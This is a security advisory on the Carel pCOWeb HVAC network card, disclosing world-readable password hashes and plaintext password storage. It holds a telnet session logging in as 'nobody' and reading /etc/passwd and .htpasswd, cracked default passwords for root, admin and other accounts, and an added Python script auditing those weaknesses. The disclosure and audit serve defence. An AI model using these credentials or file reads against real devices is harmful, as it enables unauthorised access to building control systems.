Unsafe Storage of Credentials in Carel pCOWeb HVAC

The Carel pCOWeb card stores password hashes in the file “/etc/passwd”, allowing privilege escalation by authenticated users. Additionally, plaintext copies of the passwords are stored.

Details

  • Product: HVAC units using the OEM Carel pCOWeb Ethernet Control Interface
  • Affected Versions: “A 1.4.11 - B 1.4.2”, possibly others
  • Fixed Versions: product obsolete
  • Vulnerability Type: Credential Disclosure / Privilege Escalation
  • Security Risk: low
  • Vendor URL: https://www.carel.com/product/pcoweb-card
  • Vendor Status: notified / product obsolete
  • Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-013
  • Advisory Status: published
  • CVE: GENERIC-MAP-NOMATCH
  • CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH

Introduction

“The pCOWeb card is used to interface the pCO Sistema to networks that use the HVAC protocols based on the Ethernet physical standard, such as BACnet IP, Modbus TCP/IP and SNMP. The card also features an integrated Web-Server, which both contains the HTML pages relating to the specific application and allows a browser to be used for remote system management.” (from the vendor’s homepage)

It is used as an OEM module in several different HVAC systems and considered obsolete by the vendor.

More Details

The Carel pCOWeb interface provides user accounts with different levels of privileges. Regardless of these privilege levels, every user, including the user “nobody”, is able to read the file “/etc/passwd”, which contains the hashed passwords of all user accounts, including those with higher privileges. Additionally, a plaintext copy of all passwords is stored in the file “/usr/local/root/flash/etc/sysconfig/userspwd”, which is accessible from the web interface at the URL http://192.168.0.1/config/pw_changeusers.html. This allows attackers with knowledge of one user account's password to learn the other accounts' passwords and possibly gain more privileges.

Proof of Concept

Apart from a web interface, the Carel pCOWeb card provides a telnet interface accessible using a variety of default passwords and, in some cases, the user “nobody” without password:

$ telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.

Linux 2.4.21-rmk1 (pCOWeb) (ttya0)


pCOWeb login: nobody
No directory /var/lib/nobody!
Logging in with home = "/".
Executing profile
/usr/local/bin:/bin:/usr/bin
[nobody@pCOWeb13:58:55 /]$ ls -la /etc/passwd
-rw-r--r--   1 root     root          317 Jan  1 00:00 /etc/passwd
[nobody@pCOWeb13:59:00 /]$ cat /etc/passwd
root:o4jAwxNRjdSSk:0:0:root:/root:/bin/bash
http::48:48:HTTP users:/usr/http/root:/bin/bash
nobody::99:99:nobody:/var/lib/nobody:/bin/bash
httpadmin:p4erNF6yyLx0U:200:200:httpadmin:/usr/local/root/http:/bin/bash
carel:f4msfA.Ljf2Fo:500:500:carel:/home:/bin/bash
guest:d4iIyYc5JrnxM:502:101:guest:/usr/bin:/bin/bash
[nobody@pCOWeb13:59:32 /]$ cat /usr/local/root/admin/.htpasswd
admin:7c3fxxrcHcwtc
[nobody@pCOWeb13:59:33 /]$

The following table lists the cleartext passwords for the above password hashes:

username  | password
----------|---------
root      | froot
httpadmin | fhttpadm
carel     | fcarel
guest     | fguest
nobody    | (none)
admin     | fadmin

The passwords for the user accounts “root”, “httpadmin”, “carel” and “guest” are documented in section 9.7.2 of the user manual (https://www.carel.com/documents/10191/0/+030220471/9619472f-f1c0-4ec9-a151-120aaa5e479a?version=1.0), which warns users:

“it is important to set a password other than the default “froot” to
prevent potentially dangerous outside access.”

It is possible that these default credentials are covered in CVE-2019-13553. Depending on firmware version and/or OEM modifications, some versions additionally allow Telnet login without password with the username “nobody” while it is disabled for other versions.

The password for the web interface user “admin” is documented in section 9.2.1 of the user manual (https://www.carel.com/documents/10191/0/+030220471/9619472f-f1c0-4ec9-a151-120aaa5e479a?version=1.0).

Additionally, some versions were seen with additional user credentials stored in the directory provided for OEM modifications of the web interface, such as the username “reserved” with the password “freserve” in “/usr/local/root/flash/http/reserved/.htpasswd”. Storing some of these passwords in plaintext is covered in CVE-2019-11369.

However, while the above passwords are stored in hashed form, the web interface at http://192.168.0.1/config/pw_changeusers.html shows them in plaintext. A file containing the plaintext passwords can be found in the filesystem:

[root@pCOWeb14:02:14 /]# cat /usr/local/root/flash/etc/sysconfig/userspwd
PROOT=froot
PHTTP=fhttpadmin
PGUEST=fguest
PCAREL=fcarel
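As an added example that is not part of the advisory, the following script audits the two storage weaknesses described above: password hashes that are world-readable in “/etc/passwd” (or accounts with an empty password field), and plaintext passwords in “userspwd” that still equal the defaults documented in the manual. It assumes the file contents have already been collected from the card; the sample input is constructed from the lines quoted above, and the comparison uses only the first eight characters because traditional crypt(3) ignores the rest, which is why “fhttpadm” and “fhttpadmin” verify against the same hash.

```python
import re

# Default passwords documented in the Carel user manual (sections 9.7.2 and 9.2.1).
DOCUMENTED_DEFAULTS = ("froot", "fhttpadmin", "fcarel", "fguest", "fadmin")
# Traditional DES crypt(3): 13 chars of [./0-9A-Za-z] (2-char salt); only the
# first 8 password characters are significant, so "fhttpadmin" == "fhttpadm".
DES_CRYPT_RE = re.compile(r"^[./0-9A-Za-z]{13}$")
SIGNIFICANT = 8

def audit_passwd(text):
    findings = []  # (account, issue) pairs for a /etc/passwd-style file
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, "malformed entry"))
            continue
        user, pw = fields[0], fields[1]
        if pw == "":
            findings.append((user, "empty password field, login without password"))
        elif pw in ("x", "*", "!"):
            continue  # hash is in /etc/shadow or the account is locked
        elif DES_CRYPT_RE.match(pw):
            findings.append((user, "DES crypt hash world-readable in /etc/passwd"))
        else:
            findings.append((user, "hash of another type stored in /etc/passwd"))
    return findings

def audit_userspwd(text):
    """Flag plaintext passwords and unchanged vendor defaults in userspwd."""
    defaults = {d[:SIGNIFICANT] for d in DOCUMENTED_DEFAULTS}
    findings = []
    for line in text.splitlines():
        if "=" not in line:
            continue
        key, value = line.split("=", 1)
        findings.append((key, "password stored in plaintext"))
        if value[:SIGNIFICANT] in defaults:
            findings.append((key, f"documented default password {value!r} unchanged"))
    return findings

# Constructed sample input, copied from the session quoted in the advisory.
SAMPLE_PASSWD = """root:o4jAwxNRjdSSk:0:0:root:/root:/bin/bash
nobody::99:99:nobody:/var/lib/nobody:/bin/bash
httpadmin:p4erNF6yyLx0U:200:200:httpadmin:/usr/local/root/http:/bin/bash
"""
SAMPLE_USERSPWD = "PROOT=froot\nPHTTP=fhttpadmin\nPGUEST=changed-xyz\n"
if __name__ == "__main__":
    for account, issue in audit_passwd(SAMPLE_PASSWD) + audit_userspwd(SAMPLE_USERSPWD):
        print(f"{account}: {issue}")
```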

Workaround

Change all default passwords listed above and ensure the user “nobody” is disabled or has a password set. The Carel pCOWeb card should not be connected to networks accessible by untrusted users (compare advisory rt-sa-2019-014 (https://www.redteam-pentesting.de/de/advisories/rt-sa-2019-014.txt)).

Fix

No updated firmware will be published for pCOWeb Cards, as they are obsolete since Dec 2017. A successor hardware with current firmware is available for OEM integrators.

Security Risk

Attackers with knowledge of one set of user credentials for a Carel pCOWeb card could use the password hashes readable by all users in “/etc/passwd”, or the plaintext copies of the passwords, to obtain the privileges of other accounts. Because valid credentials are required in the first place, this is considered to pose a low risk only.

Timeline

  • 2019-07-17 Vulnerability identified
  • 2019-08-03 Customer approved disclosure to vendor
  • 2019-09-02 Vendor notified
  • 2019-09-09 Vendor did not respond as promised
  • 2019-09-17 Vendor could not be reached
  • 2019-09-18 Vendor could not be reached
  • 2019-09-18 Vendor could not be reached
  • 2019-10-28 Advisory published due to publication of CVE-2019-13553

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/